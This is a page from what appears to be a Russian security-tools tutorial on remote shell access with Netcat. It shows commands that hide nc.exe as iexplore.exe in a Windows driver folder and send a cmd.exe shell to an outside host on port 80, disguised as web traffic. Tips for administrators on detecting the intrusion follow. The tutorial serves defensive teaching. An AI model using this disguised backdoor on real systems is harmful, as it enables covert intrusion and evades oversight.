Инструментальные средства обеспечения безопасности


Получение удаленного доступа к командной оболочке - часть 3


C:\>mkdir c:\Windows\System32\Drivers\q C:\>move nc.exe c:\Windows\System32\Drivers\q\iexplore.exe C:\>cd c:\Windows\System32\Drivers\q c:\Windows\System32\Drivers\q>iexplore.exe Cmd line -d -e cmd.exe originix 80 c:\Windows\System32\Drivers\q>

Теперь Netcat в режиме "прослушивания" должен контролировать командный интерпретатор на Windows машине. Такой подход поможет лучше выполнить работу по маскировке "черного хода" от системного администратора. На первый взгляд соединение будет выглядеть всего лишь, как безобидное HTTP-соединение интернет-броузера. Взломщика может расстраивать только то, что после завершения работы командного интерпретатора у него нет никаких способов перезапустить процесс на Windows машине.

Есть несколько способов, с помощью которых системный администратор может обнаружить проникновение с использованием Netcat.

  • Использовать утилиту поиска файлов Windows для поиска файлов, содержащих строки "listen mode", или "inbound connection". Любой из найденных исполняемых модулей может оказаться программой Netcat.
  • Проверять список активных процессов на предмет поиска любых непонятно зачем выполняемых файлов cmd.exe. За исключением случаев, когда взломщик переименовал cmd.exe, вы сможете поймать его на использовании удаленного выполнения команд, поскольку cmd.exe будет выполняться так, что вы не сможете получить к нему доступ.
  • Использовать команду netstat ("Системные средства с открытым программным кодом: основы") или fprot (лекции "Компоновка и использование набора инструментов для расследования хакерских атак, то есть для "живого ответа" в системе Windows"), чтобы увидеть, какие порты используются в настоящее время и какие приложения их используют. Тем не менее, будьте осторожны с использованием netstat. Netstat может быть легко заменен его "троянской" версией, специально созданной взломщиком для скрытия своей деятельности. Netstat также иногда не сообщает о прослушивании TCP-сокетов до тех пор, пока кто-нибудь не соединится с ним.




- Начало -  - Назад -  - Вперед -